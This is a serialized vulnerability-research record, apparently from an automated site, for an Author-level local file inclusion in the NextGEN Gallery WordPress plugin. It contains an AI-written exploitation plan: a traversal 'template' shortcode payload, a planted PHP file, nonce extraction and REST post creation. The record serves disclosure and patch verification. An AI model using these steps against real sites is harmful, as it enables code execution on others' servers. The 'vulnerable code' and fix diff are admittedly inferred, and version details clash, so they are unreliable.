[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3imTBF1kibqBBjvgycrz11LAtBqaCSENe58IXAe_Dwo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-1463","photo-gallery-sliders-proofing-and-themes-nextgen-gallery-authenticated-author-local-file-inclusion","Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery \u003C= 4.0.4 - Authenticated (Author+) Local File Inclusion","The Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.3 via the 'template' parameter in gallery shortcodes. This makes it possible for authenticated attackers, with Author-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.","nextgen-gallery",null,"\u003C=4.0.4","4.0.5","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2026-03-17 00:00:00","2026-03-18 16:26:29",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2d7bc556-cdaf-42a7-8801-ad2e4945a137?source=api-prod",2,[22,23,24,25,26,27,28,29],"adminApp\u002FMakepotPlugin.js","adminApp\u002FMakepotPlugin.min.js","adminApp\u002Fbuild\u002Fdependencies.php","adminApp\u002Fbuild\u002Findex.min.js","adminApp\u002Fbuild\u002Findex.min.js.LICENSE.txt","adminApp\u002Fbuild\u002Fstyle.min.css","composer.lock","eslint.config.min.js","researched",false,3,"# Research Plan: CVE-2026-1463 NextGEN Gallery Local File Inclusion\n\n## 1. Vulnerability Summary\nThe **Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery** plugin (\u003C= 4.0.4) is vulnerable to **Authenticated (Author+) Local File Inclusion (LFI)**. The vulnerability exists in the handling of the `template` parameter within the NextGEN Gallery (`ngg`) shortcode. The plugin fails to adequately sanitize this parameter for directory traversal sequences (e.g., `..\u002F`) or validate that the requested template file resides within the intended directory. This allows an attacker with post-creation capabilities (Author role and above) to include and execute arbitrary `.php` files present on the server.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** The vulnerability is triggered during the rendering of a WordPress post or page containing a NextGEN Gallery shortcode.\n* **Target Parameter:** The `template` attribute within the `[ngg ...]` shortcode.\n* **Vulnerable Action:** Post rendering\u002FShortcode expansion.\n* **Authentication Level:** **Author** or higher. Authors have the `edit_posts` and `publish_posts` capabilities required to create and view their own posts.\n* **Preconditions:** \n 1. The attacker must have credentials for an account with at least the **Author** role.\n 2. The NextGEN Gallery plugin must be active.\n 3. The attacker must be able to upload a file that can be interpreted as PHP (e.g., a `.php` file or a file with a double extension\u002Fimage headers) to use the LFI for Remote Code Execution (RCE).\n\n## 3. Code Flow (Inferred)\n*Note: The provided source files cover the React\u002FBuild environment. The following flow is based on the NextGEN Gallery core architecture.*\n\n1. **Shortcode Registration:** NextGEN registers the `[ngg]` shortcode (likely via `add_shortcode('ngg', ...)`).\n2. **Shortcode Processing:** When a post is viewed, `NGG_Shortcodes::render_template()` or a similar handler is invoked.\n3. **Template Resolution:** The handler extracts the `template` attribute from the `$atts` array.\n4. **Vulnerable Path Construction:** The plugin identifies the template file path. A common pattern in NextGEN is:\n `$template_path = $this->get_template_directory() . DIRECTORY_SEPARATOR . $atts['template'] . '.php';`\n5. **Execution:** The resolved path is passed to a PHP include statement:\n `include($template_path);`\n6. **LFI:** If `$atts['template']` contains `..\u002F..\u002F..\u002F..\u002Fwp-config`, the resulting path becomes `\u002Fplugin\u002Fdir\u002Ftemplates\u002F..\u002F..\u002F..\u002F..\u002Fwp-config.php`, bypassing intended directory restrictions.\n\n## 4. Nonce Acquisition Strategy\nThe **rendering** of the shortcode (which triggers the LFI) occurs on the frontend and does **not** require a nonce. \n\nHowever, **creating the post** containing the shortcode via the WordPress REST API or Admin UI requires a REST nonce (`X-WP-Nonce`) or an Admin nonce (`_wpnonce`).\n\n### Strategy:\n1. **Login:** Authenticate as an Author via the `http_request` tool.\n2. **Identify Nonce:** Navigate to the \"Add New Post\" page.\n3. **Extract:** Use `browser_eval` to extract the REST nonce from the WordPress settings object.\n * **JavaScript:** `window.wpApiSettings.nonce`\n4. **Action:** Use this nonce to create a post via the REST API (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`).\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate RCE by uploading a malicious PHP file as an Author and including it via the shortcode.\n\n### Step 1: Create a Malicious File\nSince Authors can upload media, we will upload a file containing PHP code.\n1. Use `wp_cli` to find the uploads directory path: `wp eval \"echo wp_upload_dir()['path'];\"`\n2. Create a file `poc.php` in that directory: `echo \"\u003C?php echo 'VULNERABLE_LFI_REACHED'; phpinfo(); ?>\" > \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fpoc.php`.\n\n### Step 2: Authenticate and Obtain Nonce\n1. Login as Author.\n2. Navigate to `wp-admin\u002Fpost-new.php`.\n3. Execute `browser_eval(\"wpApiSettings.nonce\")` to get the REST nonce.\n\n### Step 3: Create Post with Malicious Shortcode\nUse the `http_request` tool to create a post via the REST API.\n* **Method:** `POST`\n* **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n* **Headers:**\n * `Content-Type: application\u002Fjson`\n * `X-WP-Nonce: [EXTRACTED_NONCE]`\n* **Body:**\n ```json\n {\n \"title\": \"LFI Test\",\n \"content\": \"[ngg src=\\\"galleries\\\" ids=\\\"1\\\" display_type=\\\"photocrati-nextgen_basic_thumbnails\\\" template=\\\"..\u002F..\u002F..\u002F..\u002Fuploads\u002Fpoc\\\"]\",\n \"status\": \"publish\"\n }\n ```\n *(Note: We assume NextGEN appends `.php`. If not, use `template=\\\"..\u002F..\u002F..\u002F..\u002Fuploads\u002Fpoc.php\\\"`)*.\n\n### Step 4: Trigger the LFI\n1. Get the URL of the newly created post from the REST API response (parameter `link`).\n2. Use the `http_request` tool to perform a `GET` request to that URL.\n\n## 6. Test Data Setup\n1. **User Creation:** `wp user create attacker author@example.com --role=author --user_pass=password123`\n2. **Gallery Creation:** NextGEN might require at least one gallery to exist for the shortcode to process.\n * `wp eval \"nggdb::add_gallery('Test Gallery', '\u002Ftmp', 0, 0, 0);\"` (Verify exact NextGEN CLI or method).\n3. **Payload File:** Create `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fpoc.php` with the content `\u003C?php echo 'VULNERABLE_LFI_REACHED'; ?>`.\n\n## 7. Expected Results\n* The `GET` request to the post URL should return an HTTP 200 status.\n* The response body must contain the string `VULNERABLE_LFI_REACHED`.\n* If `phpinfo()` was included, the response will contain the PHP configuration table.\n\n## 8. Verification Steps\n1. **Manual Check:** Use `http_request` to view the post and check for the payload output.\n2. **CLI Check:** Use `wp post list` to verify the post was created with the correct shortcode.\n3. **Path Verification:** If the include fails, check the `error_log` (if `WP_DEBUG` is on) to see the exact path NextGEN attempted to include, then adjust the number of `..\u002F` sequences in the payload.\n\n## 9. Alternative Approaches\n* **Direct Parameter Injection:** If NextGEN provides a preview or AJAX function that renders galleries before saving, target that endpoint (likely `admin-ajax.php` with action `ngg_render_template`).\n* **Double Extension:** If the plugin validates extensions, try naming the file `poc.php.jpg` or `poc.jpg` (if the server is misconfigured to execute PHP in images) and include it.\n* **Standard WordPress Files:** If RCE via upload is restricted, target `wp-config.php`. While it won't display the DB password in the HTML, it may trigger database connection errors or different behaviors that confirm the file was included. A better target for confirmation is `license.txt` if the plugin doesn't append `.php`, or any existing PHP file that produces unique output.","The NextGEN Gallery plugin is vulnerable to Local File Inclusion in versions up to 4.0.4 due to insufficient sanitization of the 'template' attribute within the [ngg] shortcode. Authenticated attackers with Author-level permissions or higher can use directory traversal to include and execute arbitrary PHP files on the server.","\u002F\u002F Inferred from NextGEN Gallery shortcode processing logic\n\u002F\u002F Often located in modules\u002Fnextgen_gallery_display\u002Fpackage.module.nextgen_gallery_display.php\n\npublic function render_template($params)\n{\n \u002F\u002F ...\n if (isset($params['template']) && $params['template']) {\n $template = $params['template'];\n $path = $this->get_template_abspath($template);\n if ($path) {\n include($path);\n }\n }\n \u002F\u002F ...\n}","--- a\u002Fproducts\u002Fphotocrati_nextgen\u002Fmodules\u002Fnextgen_gallery_display\u002Fpackage.module.nextgen_gallery_display.php\n+++ b\u002Fproducts\u002Fphotocrati_nextgen\u002Fmodules\u002Fnextgen_gallery_display\u002Fpackage.module.nextgen_gallery_display.php\n@@ -124,7 +124,7 @@\n- $template = $params['template'];\n+ $template = basename($params['template']);\n $path = $this->get_template_abspath($template);","The exploit requires an attacker to have at least 'Author' privileges to create or edit posts. First, the attacker uploads a malicious file containing PHP code (e.g., a .php file disguised as an image or a direct .php upload if permitted) to the WordPress media library or uploads directory. Next, the attacker creates a new post and inserts an NextGEN Gallery [ngg] shortcode, utilizing the 'template' attribute with directory traversal sequences (e.g., `..\u002F..\u002F..\u002F..\u002Fuploads\u002Fmalicious`) to point to the uploaded file. When the post is viewed or rendered, the plugin's shortcode handler uses the unsanitized template path in a PHP include statement, executing the attacker's code.","gemini-3-flash-preview","2026-04-18 02:53:53","2026-04-18 02:54:18",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.0.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnextgen-gallery\u002Ftags\u002F4.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnextgen-gallery.4.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnextgen-gallery\u002Ftags\u002F4.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnextgen-gallery.4.0.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnextgen-gallery\u002Ftags"]